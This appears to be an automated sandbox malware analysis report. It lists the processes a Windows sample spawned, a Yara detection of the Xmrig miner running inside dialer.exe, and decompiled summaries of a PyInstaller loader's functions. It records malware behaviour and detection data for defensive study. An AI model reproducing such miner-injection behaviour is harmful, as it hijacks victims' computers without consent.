MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find ":"
Imagebase:	0x7ff6d5c20000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff7fb370000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	15:22:08
Start date:	01/03/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	15:22:09
Start date:	01/03/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	Timeout /T 1 /Nobreak
Imagebase:	0x7ff63ae30000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	224
Start time:	15:22:17
Start date:	01/03/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF61D346470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF61D3464B5

Part of subcall function 00007FF61D345E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E1C

Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C

Part of subcall function 00007FF61D33AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF61D33AFA3,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33AFCD
Part of subcall function 00007FF61D33AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF61D33AFA3,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33AFF2

_get_daylight.LIBCMT ref: 00007FF61D3464A4

Part of subcall function 00007FF61D345E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E7C

_get_daylight.LIBCMT ref: 00007FF61D34671A
_get_daylight.LIBCMT ref: 00007FF61D34672B
_get_daylight.LIBCMT ref: 00007FF61D34673C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61D34697C), ref: 00007FF61D346763

Strings

W. Europe Standard Time, xrefs: 00007FF61D346809
W. Europe Summer Time, xrefs: 00007FF61D346821

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 1458651798-690618308
Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction ID: 0ae8826251984197e8b98de2a207ef29cbae9e53258315309de3d8feac909c7a
Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction Fuzzy Hash: A1D1D032E08A5286EB60DF25D8511F9A761EF46FA4F448135EA0DC7A86FF3EE441D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3473BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61D3470F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D347131
Part of subcall function 00007FF61D3470F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3471AF
Part of subcall function 00007FF61D3470F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D347200

CreateFileW.KERNELBASE ref: 00007FF61D3474C2
CreateFileW.KERNEL32 ref: 00007FF61D347512
GetLastError.KERNEL32 ref: 00007FF61D347542
GetFileType.KERNELBASE ref: 00007FF61D347557
GetLastError.KERNEL32 ref: 00007FF61D347561
CloseHandle.KERNEL32 ref: 00007FF61D347594
CloseHandle.KERNEL32 ref: 00007FF61D3476F7
CreateFileW.KERNEL32 ref: 00007FF61D34772C
GetLastError.KERNEL32 ref: 00007FF61D34773B

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction ID: 40812f836066564d89d2975425b3c659ffbe700e9f414b3c74c84329803225b7
Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction Fuzzy Hash: B5C1C272B24E4185EB11CF64C4902BC7761EB4AFA8B414235DA1E9B3D4EF3DE056C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D327960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF61D32154F), ref: 00007FF61D3279F7

Part of subcall function 00007FF61D327B70: GetEnvironmentVariableW.KERNEL32(00007FF61D323A1F), ref: 00007FF61D327BAA
Part of subcall function 00007FF61D327B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61D327BC7

Part of subcall function 00007FF61D337EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D337F05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF61D327AB1

Part of subcall function 00007FF61D322B30: MessageBoxW.USER32 ref: 00007FF61D322C05

Strings

LOADER: Failed to set the TMP environment variable., xrefs: 00007FF61D3279DA
TMP, xrefs: 00007FF61D32799A, 00007FF61D327A59, 00007FF61D327AE7
_MEI%d, xrefs: 00007FF61D327A05
TMP, xrefs: 00007FF61D3279C0

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction ID: b5df4a715581d1a0fdd087876b50a89eec096bc3e1e61811413efed966db4771
Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction Fuzzy Hash: 3A51AE71F09E4251FE59E73669252BAD2416F8BFE4F444035ED0ECB79AFE6DE4018280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3466EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF61D34671A

Part of subcall function 00007FF61D345E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E7C

_get_daylight.LIBCMT ref: 00007FF61D34672B

Part of subcall function 00007FF61D345E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E1C

_get_daylight.LIBCMT ref: 00007FF61D34673C

Part of subcall function 00007FF61D345E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D345E4C

Part of subcall function 00007FF61D33B00C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
Part of subcall function 00007FF61D33B00C: GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF61D34697C), ref: 00007FF61D346763

Strings

W. Europe Standard Time, xrefs: 00007FF61D346809
W. Europe Summer Time, xrefs: 00007FF61D346821

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 2248164782-690618308
Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction ID: 0f9a979667027e2ab5b58a9894064ccf5007dbea6677bc7652cb3ecdb767da8d
Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction Fuzzy Hash: 73517032E18A8286E750DF25E8915A9E760BF4AFA4F444135EA4DC3A96FF3DE540C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D341038 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: d1e6bd486bfc21eb95dee70b45366dac06352df6756fd9cebcf35b02e344c8c8
Instruction ID: c992fb480c480801cd29bb26c40c7334abb82d7f4169fa886a75b983aac7de09
Opcode Fuzzy Hash: d1e6bd486bfc21eb95dee70b45366dac06352df6756fd9cebcf35b02e344c8c8
Instruction Fuzzy Hash: 49027931B09E9681FA65EB229511279E691AF43FB0F488634DD6EC67D6FF7EE4018300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D321710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF61D321866
fseek, xrefs: 00007FF61D32180D
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF61D321726
Failed to extract %s: failed to open target file!, xrefs: 00007FF61D321790
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF61D3218F5
Failed to create symbolic link %s!, xrefs: 00007FF61D321753
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF61D3218E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF61D321806
fread, xrefs: 00007FF61D3218FC
malloc, xrefs: 00007FF61D32186D
fwrite, xrefs: 00007FF61D3218EC
fopen, xrefs: 00007FF61D321797
Failed to extract %s: failed to open archive file!, xrefs: 00007FF61D3217D9

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: e432b7d969ae4dbc6f679bdd4cd7d56ef0903eb873a48b01967f492b65c7d69d
Instruction ID: 4955432559e0494990f4a032f426060fec0e89ccbdc9aecf7b5594f94b96b6aa
Opcode Fuzzy Hash: e432b7d969ae4dbc6f679bdd4cd7d56ef0903eb873a48b01967f492b65c7d69d
Instruction Fuzzy Hash: 17518D79F08E4296EA149B25E9502B9E390BF46FE8F444131DE0C87795FF3DE6448780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D321AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61D3282C0: _fread_nolock.LIBCMT ref: 00007FF61D32836A

_fread_nolock.LIBCMT ref: 00007FF61D321B54

Part of subcall function 00007FF61D322890: MessageBoxW.USER32 ref: 00007FF61D32299B

Strings

malloc, xrefs: 00007FF61D321BDD
fseek, xrefs: 00007FF61D321B33
MEI, xrefs: 00007FF61D321AE2
Could not allocate buffer for TOC!, xrefs: 00007FF61D321BD6
Could not read full TOC!, xrefs: 00007FF61D321C09
Failed to seek to cookie position!, xrefs: 00007FF61D321B2C
Error on file., xrefs: 00007FF61D321C36
Failed to read cookie!, xrefs: 00007FF61D321B5F
fread, xrefs: 00007FF61D321B66, 00007FF61D321C10

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: 85aa4d4b5c56209b993ac3b9d5e51e7e884d9423aace791278502c5c1bfd56ec
Instruction ID: 280731f78be7db63f2ac4c255b42671ab0960da5e6c0afb21d6732038dc8d8d7
Opcode Fuzzy Hash: 85aa4d4b5c56209b993ac3b9d5e51e7e884d9423aace791278502c5c1bfd56ec
Instruction Fuzzy Hash: 2B51A176E09E4286EB18CF29E550178B7A0EF4AFA8B558135D90CC7799EF7CE440C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D321000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61D323ED0: GetModuleFileNameW.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D323F01

SetDllDirectoryW.KERNEL32 ref: 00007FF61D323BF5

Part of subcall function 00007FF61D327B70: GetEnvironmentVariableW.KERNEL32(00007FF61D323A1F), ref: 00007FF61D327BAA
Part of subcall function 00007FF61D327B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF61D327BC7

Strings

Cannot side-load external archive %s (code %d)!, xrefs: 00007FF61D323B3F
MEI, xrefs: 00007FF61D323AFA
_PYI_ONEDIR_MODE, xrefs: 00007FF61D323A34, 00007FF61D323A5F
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF61D323AC6
_MEIPASS2, xrefs: 00007FF61D323A0B, 00007FF61D323A74, 00007FF61D323D27, 00007FF61D323D33
Failed to convert DLL search path!, xrefs: 00007FF61D323BE5
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF61D323B73

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-1544818733
Opcode ID: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
Instruction ID: 1fa9314695e2345acf310355525a010de49a559d3ff873518dd9ba255b28a94a
Opcode Fuzzy Hash: 6bab0e2c748948cdb6b8347042124eea430fe40a6c516e8b4567730268968bf1
Instruction Fuzzy Hash: DFB18F32E1DE8751EA65AB3199502FDE250BF46FA8F40013AEA4DC7696FF2CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF61D323D57), ref: 00007FF61D3280DF
GetStartupInfoW.KERNEL32 ref: 00007FF61D3280FE

Part of subcall function 00007FF61D33AB14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33AB28

Part of subcall function 00007FF61D338730: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D338797

GetCommandLineW.KERNEL32 ref: 00007FF61D32819E
CreateProcessW.KERNELBASE ref: 00007FF61D3281E0
WaitForSingleObject.KERNEL32 ref: 00007FF61D3281F4
GetExitCodeProcess.KERNELBASE ref: 00007FF61D328204

Strings

Error creating child process!, xrefs: 00007FF61D328210
CreateProcessW, xrefs: 00007FF61D328217

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction ID: 0c3c1b179a4f1c87c439aadd51201335db5ca5efd7140e16b9caded2521b56ba
Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction Fuzzy Hash: E6412131A08B8181DA24DB24F5552AAE361FF95BB4F500735E6AD83BD5EF7CD044CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D321050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF61D321249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF61D32111F
malloc, xrefs: 00007FF61D3210F8, 00007FF61D321126
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF61D3210B4
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF61D3210F1
1.3.1, xrefs: 00007FF61D32107E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: 7b2c84c99ae358eb5436a0da81528e03949e6f2c70fa16e61cc33f909cd68913
Instruction ID: b56199326b3d5b0e9c45c583d1827e594e2e6a0f7ed9b0fb512275246277a61f
Opcode Fuzzy Hash: 7b2c84c99ae358eb5436a0da81528e03949e6f2c70fa16e61cc33f909cd68913
Instruction Fuzzy Hash: 4F51A136E09A8285E6649B61E5503BAE2A0BF46FB8F444231ED4DC7799FF3CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33F2D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF61D33F66A,?,?,-00000018,00007FF61D33B417,?,?,?,00007FF61D33B30E,?,?,?,00007FF61D336552), ref: 00007FF61D33F44C
GetProcAddress.KERNEL32(?,?,?,00007FF61D33F66A,?,?,-00000018,00007FF61D33B417,?,?,?,00007FF61D33B30E,?,?,?,00007FF61D336552), ref: 00007FF61D33F458

Strings

ext-ms-, xrefs: 00007FF61D33F3A9
api-ms-, xrefs: 00007FF61D33F396

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction ID: ae9b3d5a0a4a537d57742aa36ef36b732b8285b64b199eb7245dbb387af04b79
Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction Fuzzy Hash: FB411332B19E5251FA1ADB16AA005B6A391BF4AFB0F884135DD4DD7784FF3CE44A8300

Uniqueness

Uniqueness Score: -1.00%

